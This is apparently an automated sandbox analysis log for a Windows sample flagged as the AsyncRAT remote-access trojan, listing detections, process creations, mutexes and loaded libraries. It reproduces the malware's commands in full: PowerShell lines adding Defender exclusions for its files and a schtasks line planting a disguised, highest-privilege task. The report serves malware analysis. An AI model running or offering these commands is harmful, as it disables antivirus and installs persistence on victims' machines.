                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA21412_2_00007FFD9BAA2141
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9BBA333212_2_00007FFD9BBA3332
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 16_2_00007FFD9BAA16D916_2_00007FFD9BAA16D9
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 16_2_00007FFD9BAA0FF816_2_00007FFD9BAA0FF8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 16_2_00007FFD9BAA214116_2_00007FFD9BAA2141
                        Source: C:\Users\Public\Runtime BrokerCode function: 23_2_00007FFD9BAD16D923_2_00007FFD9BAD16D9
                        Source: C:\Users\Public\Runtime BrokerCode function: 23_2_00007FFD9BAD0FF823_2_00007FFD9BAD0FF8
                        Source: C:\Users\Public\Runtime BrokerCode function: 23_2_00007FFD9BAD214123_2_00007FFD9BAD2141
                        Source: 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BC2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRuntime Broker.exe4 vs 80BvHOM51j.exe
                        Source: 80BvHOM51j.exe, 00000000.00000002.2910321731.000001EE0BC2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRuntime Broker.exe4 vs 80BvHOM51j.exe
                        Source: 80BvHOM51j.exe, 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRuntime Broker.exe4 vs 80BvHOM51j.exe
                        Source: 80BvHOM51j.exe, 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRuntime Broker.exe4 vs 80BvHOM51j.exe
                        Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.coonfart.exe.12d61a78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.0.coonfart.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\Public\Runtime Broker, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: coonfart.exe.0.dr, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: coonfart.exe.0.dr, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: coonfart.exe.0.dr, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Runtime Broker.2.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Runtime Broker.2.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: coonfart.exe.0.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: coonfart.exe.0.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, RdUutxlZeW6b75qg39GcLx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@32/30@3/5
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Jump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                        Source: C:\Users\Public\Runtime BrokerMutant created: NULL
                        Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeMutant created: \Sessions\1\BaseNamedObjects\9qmKYugMaLefqzVF
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                        Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "
                        Source: 80BvHOM51j.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 80BvHOM51j.exeVirustotal: Detection: 9%
                        Source: unknownProcess created: C:\Users\user\Desktop\80BvHOM51j.exe "C:\Users\user\Desktop\80BvHOM51j.exe"
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe"
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coonfart.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker"
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\Public\Runtime Broker "C:\Users\Public\Runtime Broker"
                        Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat" "Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coonfart.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker"Jump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeSection loaded: dnsapi.dllJump to behavior
